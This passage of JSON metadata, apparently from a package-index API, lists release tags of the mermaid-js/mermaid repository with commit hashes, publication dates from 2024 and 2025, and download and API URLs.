s.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@